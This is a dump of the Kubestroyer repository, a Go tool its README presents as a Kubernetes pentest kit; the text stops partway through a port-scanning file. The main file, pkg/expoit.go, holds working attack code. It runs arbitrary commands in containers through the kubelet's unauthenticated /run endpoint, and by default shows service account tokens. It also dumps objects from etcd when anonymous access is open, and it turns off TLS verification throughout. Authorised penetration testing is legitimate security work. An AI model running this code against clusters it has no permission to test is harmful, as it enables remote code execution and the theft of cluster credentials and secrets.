Repository: Rolix44/Kubestroyer Branch: master Commit: 74b074ead724 Files: 12 Total size: 31.4 KB Directory structure: gitextract_ggafct49/ ├── .gitignore ├── LICENSE.txt ├── README.md ├── cmd/ │ └── kubestroyer/ │ └── main.go ├── go.mod ├── go.sum ├── pkg/ │ ├── cmd.go │ ├── expoit.go │ └── scanning.go └── utils/ ├── config.go ├── display.go └── ports.go ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ .idea ================================================ FILE: LICENSE.txt ================================================ MIT License Copyright (c) 2023 Rolix Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================
[![Contributors][contributors-shield]][contributors-url] [![Forks][forks-shield]][forks-url] [![Stargazers][stars-shield]][stars-url] [![Issues][issues-shield]][issues-url] [![MIT License][license-shield]][license-url]

Logo

Kubestroyer

Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests
Explore the docs »

Report Bug · Request Feature

Table of Contents
  1. About The Project
  2. Getting Started
  3. Usage
  4. Roadmap
  5. Contributing
  6. License
  7. Contact
## About The Project [![Product Name Screen Shot][product-screenshot]]() **Kubestroyer** is a Golang exploitation tool that aims to take advantage of Kubernetes clusters misconfigurations. The tool is scanning known Kubernetes ports that can be exposed as well as exploiting them.

(back to top)

### Built With
[![Golang][Golang]][Golang-url]

(back to top)

## Getting Started To get a local copy up and running, follow these simple example steps. ### Prerequisites * Go 1.19 ```sh wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz ``` ### Installation Use [prebuilt binary](https://github.com/Rolix44/Kubestroyer/releases) **or** Using go install command : ```sh $ go install github.com/Rolix44/Kubestroyer@latest ``` **or** build from source: 1. Clone the repo ```sh $ git clone https://github.com/Rolix44/Kubestroyer.git ``` 2. build the binary ```sh $ go build -o Kubestroyer cmd/kubestroyer/main.go ```

(back to top)

## Usage [![Product usage][usage-gif]]() | Parameter | Description | Mand/opt | Example | |--------------|-----------------------------------------------------------------------------|---|------------------------------------------| | -t / --target | Target (IP, domain or file) | Mandatory | -t localhost,127.0.0.1 / -t ./domain.txt | | --node-scan | Enable node port scanning (port 30000 to 32767) | Optionnal | -t localhost --node-scan | | --anon-rce | RCE using Kubelet API anonymous auth | Optionnal | -t localhost --anon-rce | | -x | Command to execute when using RCE (display service account token by default) | Optionnal | -t localhost --anon-rce -x "ls -al" | | --etcd | Read wanted objects if etcd anonymous access is enabled | Optionnal | -t localhost --etcd |

(back to top)

## Currently supported features - Target - List of multiple targets - Input file as target - Scanning - Known ports scan - Node port scan (30000 to 32767) - Port description - Vulnerabilities - Annon RCE on Kubelet - Choose command to execute - Choose container to execute command in - Etcd anonymous read

(back to top)

## Roadmap - [x] Choose the pod for anon RCE - [x] Etcd exploit - [ ] Kubelet read-only API parsing for information disclosure See the [open issues](https://github.com/Rolix44/Kubestroyer/issues) for a full list of proposed features (and known issues).

(back to top)

## Contributing Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are **greatly appreciated**. If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again! 1. Fork the Project 2. Create your Feature Branch (`git checkout -b feature/AmazingFeature`) 3. Commit your Changes (`git commit -m 'Add some AmazingFeature'`) 4. Push to the Branch (`git push origin feature/AmazingFeature`) 5. Open a Pull Request

(back to top)

## License Distributed under the MIT License. See `LICENSE.txt` for more information.

(back to top)

## Contact Rolix - [@Rolix_cy](https://twitter.com/Rolix_cy) - rolixcy@protonmail.com Project Link: [https://github.com/Rolix44/Kubestroyer](https://github.com/Rolix44/Kubestroyer)

(back to top)

[contributors-shield]: https://img.shields.io/github/contributors/Rolix44/Kubestroyer.svg?style=for-the-badge [contributors-url]: https://github.com/Rolix44/Kubestroyer/graphs/contributors [forks-shield]: https://img.shields.io/github/forks/Rolix44/Kubestroyer.svg?style=for-the-badge [forks-url]: https://github.com/Rolix44/Kubestroyer/network/members [stars-shield]: https://img.shields.io/github/stars/Rolix44/Kubestroyer.svg?style=for-the-badge [stars-url]: https://github.com/Rolix44/Kubestroyer/stargazers [issues-shield]: https://img.shields.io/github/issues/Rolix44/Kubestroyer.svg?style=for-the-badge [issues-url]: https://github.com/Rolix44/Kubestroyer/issues [license-shield]: https://img.shields.io/github/license/Rolix44/Kubestroyer.svg?style=for-the-badge [license-url]: https://github.com/Rolix44/Kubestroyer/blob/master/LICENSE.txt [linkedin-shield]: https://img.shields.io/badge/-LinkedIn-black.svg?style=for-the-badge&logo=linkedin&colorB=555 [Golang]: https://img.shields.io/badge/Golang-0769AD?style=for-the-badge&logo=Go&logoColor=white [Golang-url]: https://go.dev/ [product-screenshot]: .github/project-name.png [release]: https://github.com/Rolix44/Kubestroyer/releases/new [usage-gif]: .github/kubestroyer-usage.gif ================================================ FILE: cmd/kubestroyer/main.go ================================================ package main import ( "fmt" "github.com/Rolix44/Kubestroyer/pkg" "github.com/Rolix44/Kubestroyer/utils" ) func main() { fmt.Println("\x1b[1;36m" + utils.Toolname + "\x1b[0m") fmt.Println(utils.Author) fmt.Println(utils.Split) utils.Config() pkg.Execute() } ================================================ FILE: go.mod ================================================ module github.com/Rolix44/Kubestroyer go 1.19 require ( github.com/AlecAivazis/survey/v2 v2.3.7 github.com/pborman/getopt/v2 v2.1.0 go.etcd.io/etcd/client/v3 v3.5.11 go.uber.org/zap v1.27.0 google.golang.org/grpc v1.59.0 ) require ( github.com/coreos/go-semver v0.3.0 // indirect github.com/coreos/go-systemd/v22 v22.3.2 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/golang/protobuf v1.5.4 // indirect github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect github.com/mattn/go-colorable v0.1.2 // indirect github.com/mattn/go-isatty v0.0.8 // indirect github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b // indirect go.etcd.io/etcd/api/v3 v3.5.11 // indirect go.etcd.io/etcd/client/pkg/v3 v3.5.11 // indirect go.uber.org/multierr v1.11.0 // indirect golang.org/x/net v0.17.0 // indirect golang.org/x/sys v0.13.0 // indirect golang.org/x/term v0.13.0 // indirect; indirects golang.org/x/text v0.13.0 // indirect google.golang.org/genproto v0.0.0-20230822172742-b8732ec3820d // indirect google.golang.org/genproto/googleapis/api v0.0.0-20230822172742-b8732ec3820d // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20230822172742-b8732ec3820d // indirect google.golang.org/protobuf v1.33.0 // indirect ) ================================================ FILE: go.sum ================================================ github.com/AlecAivazis/survey/v2 v2.3.7 h1:6I/u8FvytdGsgonrYsVn2t8t4QiRnh6QSTqkkhIiSjQ= github.com/AlecAivazis/survey/v2 v2.3.7/go.mod h1:xUTIdE4KCOIjsBAE1JYsUPoCqYdZ1reCfTwbto0Fduo= github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2 h1:+vx7roKuyA63nhn5WAunQHLTznkw5W8b1Xc0dNjp83s= github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2/go.mod h1:HBCaDeC1lPdgDeDbhX8XFpy1jqjK0IBG8W5K+xYqA0w= github.com/coreos/go-semver v0.3.0 h1:wkHLiw0WNATZnSG7epLsujiMCgPAc9xhjJ4tgnAxmfM= github.com/coreos/go-semver v0.3.0/go.mod h1:nnelYz7RCh+5ahJtPPxZlU+153eP4D4r3EedlOD2RNk= github.com/coreos/go-systemd/v22 v22.3.2 h1:D9/bQk5vlXQFZ6Kwuu6zaiXJ9oTPe68++AzAJc1DzSI= github.com/coreos/go-systemd/v22 v22.3.2/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc= github.com/creack/pty v1.1.17 h1:QeVUsEDNrLBW4tMgZHvxy18sKtr6VI492kBhUfhDJNI= github.com/creack/pty v1.1.17/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q= github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/go-cmp v0.5.9 h1:O2Tfq5qg4qc4AmwVlvv0oLiVAGB7enBSJ2x2DqQFi38= github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec h1:qv2VnGeEQHchGaZ/u7lxST/RaJw+cv273q79D81Xbog= github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec/go.mod h1:Q48J4R4DvxnHolD5P8pOtXigYlRuPLGl6moFx3ulM68= github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs= github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8= github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/mattn/go-colorable v0.1.2 h1:/bC9yWikZXAL9uJdulbSfyVNIR3n3trXl+v8+1sx8mU= github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= github.com/mattn/go-isatty v0.0.8 h1:HLtExJ+uU2HOZ+wI0Tt5DtUDrx8yhUqDcp7fYERX4CE= github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b h1:j7+1HpAFS1zy5+Q4qx1fWh90gTKwiN4QCGoY9TWyyO4= github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= github.com/pborman/getopt/v2 v2.1.0 h1:eNfR+r+dWLdWmV8g5OlpyrTYHkhVNxHBdN2cCrJmOEA= github.com/pborman/getopt/v2 v2.1.0/go.mod h1:4NtW75ny4eBw9fO1bhtNdYTlZKYX5/tBLtsOpwKIKd0= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk= github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= go.etcd.io/etcd/api/v3 v3.5.11 h1:B54KwXbWDHyD3XYAwprxNzTe7vlhR69LuBgZnMVvS7E= go.etcd.io/etcd/api/v3 v3.5.11/go.mod h1:Ot+o0SWSyT6uHhA56al1oCED0JImsRiU9Dc26+C2a+4= go.etcd.io/etcd/client/pkg/v3 v3.5.11 h1:bT2xVspdiCj2910T0V+/KHcVKjkUrCZVtk8J2JF2z1A= go.etcd.io/etcd/client/pkg/v3 v3.5.11/go.mod h1:seTzl2d9APP8R5Y2hFL3NVlD6qC/dOT+3kvrqPyTas4= go.etcd.io/etcd/client/v3 v3.5.11 h1:ajWtgoNSZJ1gmS8k+icvPtqsqEav+iUorF7b0qozgUU= go.etcd.io/etcd/client/v3 v3.5.11/go.mod h1:a6xQUEqFJ8vztO1agJh/KQKOMfFI8og52ZconzcDJwE= go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto= go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0= go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y= go.uber.org/zap v1.27.0 h1:aJMhYGrd5QSmlpLMr2MftRKl7t8J8PTZPA732ud/XR8= go.uber.org/zap v1.27.0/go.mod h1:GB2qFLM7cTU87MWRP2mPIjqfIDnGu+VIO4V/SdhGo2E= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM= golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE= golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/term v0.13.0 h1:bb+I9cTfFazGW51MZqBVmZy7+JEJMouUHTUSKVQLBek= golang.org/x/term v0.13.0/go.mod h1:LTmsnFJwVN6bCy1rVCoS+qHT1HhALEFxKncY3WNNh4U= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.4.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/text v0.13.0 h1:ablQoSUd0tRdKxZewP80B+BaqeKJuVhuRxj/dkrun3k= golang.org/x/text v0.13.0/go.mod h1:TvPlkZtksWOMsz7fbANvkp4WM8x/WCo/om8BMLbz+aE= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE= golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= google.golang.org/genproto v0.0.0-20230822172742-b8732ec3820d h1:VBu5YqKPv6XiJ199exd8Br+Aetz+o08F+PLMnwJQHAY= google.golang.org/genproto v0.0.0-20230822172742-b8732ec3820d/go.mod h1:yZTlhN0tQnXo3h00fuXNCxJdLdIdnVFVBaRJ5LWBbw4= google.golang.org/genproto/googleapis/api v0.0.0-20230822172742-b8732ec3820d h1:DoPTO70H+bcDXcd39vOqb2viZxgqeBeSGtZ55yZU4/Q= google.golang.org/genproto/googleapis/api v0.0.0-20230822172742-b8732ec3820d/go.mod h1:KjSP20unUpOx5kyQUFa7k4OJg0qeJ7DEZflGDu2p6Bk= google.golang.org/genproto/googleapis/rpc v0.0.0-20230822172742-b8732ec3820d h1:uvYuEyMHKNt+lT4K3bN6fGswmK8qSvcreM3BwjDh+y4= google.golang.org/genproto/googleapis/rpc v0.0.0-20230822172742-b8732ec3820d/go.mod h1:+Bk1OCOj40wS2hwAMA+aCW9ypzm63QTBBHp6lQ3p+9M= google.golang.org/grpc v1.59.0 h1:Z5Iec2pjwb+LEOqzpB2MR12/eKFhDPhuqW91O+4bwUk= google.golang.org/grpc v1.59.0/go.mod h1:aUPDwccQo6OTjy7Hct4AfBPD1GptF4fyUjIkQ9YtF98= google.golang.org/protobuf v1.33.0 h1:uNO2rsAINq/JlFpSdYEKIZ0uKD/R9cpdv0T+yoGwGmI= google.golang.org/protobuf v1.33.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= ================================================ FILE: pkg/cmd.go ================================================ package pkg import ( "bufio" "log" "os" "strings" "github.com/Rolix44/Kubestroyer/utils" ) func Execute() { _, err := os.Stat(utils.Target) if err != nil { utils.Targets = strings.Split(utils.Target, ",") } else { file, err := os.Open(utils.Target) if err != nil { log.Fatal(err) } defer file.Close() sc := bufio.NewScanner(file) for sc.Scan() { utils.Targets = append(utils.Targets, sc.Text()) } if err := sc.Err(); err != nil { log.Fatal(err) } } for _, target := range utils.Targets { if !utils.AnonRce && !utils.ScanEtcd { checkPorts(target) } if utils.AnonRce { anonRce(target) } if utils.ScanEtcd { readEtcdObjects(target) } } } ================================================ FILE: pkg/expoit.go ================================================ package pkg import ( "context" "crypto/tls" "encoding/json" "errors" "fmt" "github.com/AlecAivazis/survey/v2" clientv3 "go.etcd.io/etcd/client/v3" "go.uber.org/zap" "go.uber.org/zap/zapcore" "google.golang.org/grpc/codes" "google.golang.org/grpc/status" "io" "log" "net/http" "strings" "time" "github.com/Rolix44/Kubestroyer/utils" ) func surveyResult(input []string, message string) []string { var selectedObjects []string prompt := &survey.MultiSelect{ Message: message, Options: input, } err := survey.AskOne(prompt, &selectedObjects) if err != nil { log.Fatalln("Failed to select :", err) return nil } return selectedObjects } func parsePod(target string) *utils.RunningPods { http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true} resp, err := http.Get("https://" + target + ":10250/runningpods/") if err != nil { log.Fatalf("Fail execute request on '%s'", target) } defer resp.Body.Close() body, err := io.ReadAll(resp.Body) if err != nil { fmt.Print("Fail to read body") } if string(body) == "Unauthorized" { log.Fatalln(string(body)) } if strings.HasPrefix(string(body), "Forbidden") { log.Fatalln(string(body)) } pods := &utils.RunningPods{} err = json.Unmarshal(body, &pods) if err != nil { log.Fatalln(err) } return pods } func anonRce(target string) { http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true} runpod := parsePod(target) var containers []string for i := 0; i < len(runpod.Items); i++ { for j := 0; j < len(runpod.Items[i].Spec.Containers); j++ { containers = append(containers, runpod.Items[i].Spec.Containers[j].Name) } } result := surveyResult(containers, "Select pod to RCE") fmt.Printf("Trying anon RCE using '%s' for '%s'\n\n", utils.RceCommand, target) for _, selectedContainer := range result { for i := 0; i < len(runpod.Items); i++ { found := false for j := 0; j < len(runpod.Items[i].Spec.Containers); j++ { namespace := runpod.Items[i].Metadata.Namespace pod := runpod.Items[i].Metadata.Name container := runpod.Items[i].Spec.Containers[j].Name if selectedContainer != container { break } url := "https://" + target + ":10250/run/" + namespace + "/" + pod + "/" + container method := "POST" fmt.Printf("Namespace : '%s' \nPod : '%s' \nContainer : '%s' \n\n", namespace, pod, container) payload := strings.NewReader("cmd=" + utils.RceCommand) client := &http.Client{} req, err := http.NewRequest(method, url, payload) if err != nil { fmt.Println(err) return } req.Header.Add("Content-Type", "application/x-www-form-urlencoded") res, err := client.Do(req) if err != nil { fmt.Println(err) return } defer res.Body.Close() body, err := io.ReadAll(res.Body) if err != nil { fmt.Println(err) return } if body != nil && !strings.Contains(string(body), "failed") { found = true fmt.Println(string(body)) break } } if found { break } } } fmt.Println(utils.Split) } func readEtcdObjects(target string) { loggerConfig := zap.Config{ Level: zap.NewAtomicLevelAt(zapcore.ErrorLevel), Development: false, DisableCaller: true, DisableStacktrace: true, Encoding: "json", EncoderConfig: zapcore.EncoderConfig{ TimeKey: "ts", LevelKey: "level", NameKey: "logger", MessageKey: "msg", StacktraceKey: "stacktrace", LineEnding: zapcore.DefaultLineEnding, EncodeLevel: zapcore.LowercaseLevelEncoder, EncodeTime: zapcore.EpochMillisTimeEncoder, EncodeDuration: zapcore.SecondsDurationEncoder, }, OutputPaths: []string{"stdout"}, ErrorOutputPaths: []string{"stderr"}, } logger, err := loggerConfig.Build() if err != nil { fmt.Printf("Error setting up logger: %v", err) return } zap.ReplaceGlobals(logger) cli, err := clientv3.New(clientv3.Config{ Endpoints: []string{target + ":2379"}, DialTimeout: 5 * time.Second, Logger: logger, }) if err != nil { if errStatus, ok := status.FromError(err); ok && errStatus.Code() == codes.Unavailable { fmt.Println("Cannot connect to etcd: the server might be down or misconfigured") } else { fmt.Printf("Failed to connect to etcd: %v\n", err) } return } defer cli.Close() ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) defer cancel() resp, err := cli.Get(ctx, "/", clientv3.WithKeysOnly(), clientv3.WithPrefix()) if err != nil { if errors.Is(err, context.Canceled) { fmt.Println("Context canceled") } else if errors.Is(err, context.DeadlineExceeded) { fmt.Println("Operation timed out") } else { fmt.Printf("Failed to retrieve keys: %v\n", err) } return } var objects []string for _, data := range resp.Kvs { objects = append(objects, string(data.Key)) } if len(objects) == 0 { fmt.Println("No objects found in Etcd") return } selectedObjects := surveyResult(objects, "Select objects to print:") for _, selected := range selectedObjects { ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) resp, err := cli.Get(ctx, selected) cancel() if err != nil { fmt.Printf("Error fetching value for %s: %v\n", selected, err) continue } fmt.Printf("Value for %s:\n %s\n", selected, resp.Kvs[0].Value) } fmt.Println(utils.Split) } ================================================ FILE: pkg/scanning.go ================================================ package pkg import ( "crypto/tls" "fmt" "net" "net/http" "strconv" "strings" "time" "github.com/Rolix44/Kubestroyer/utils" ) var openPort []int func nodeportScan(target string, port int) { d := net.Dialer{Timeout: 5} servAddr := target + ":" + strconv.Itoa(port) _, err := d.Dial("tcp", servAddr) if err != nil { return } openPort = append(openPort, port) } func sendHttpRequest(target string, port int, endpoint string) { http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true} client := http.Client{ Timeout: 3 * time.Second, } resp, err := client.Get(target + ":" + strconv.Itoa(port) + endpoint) if err == nil { openPort = append(openPort, port) defer resp.Body.Close() } } func checkPorts(target string) { fmt.Printf("Starting port scan for '%s'... \n\n", target) openPort = nil if utils.ScanNode { for port := 30000; port 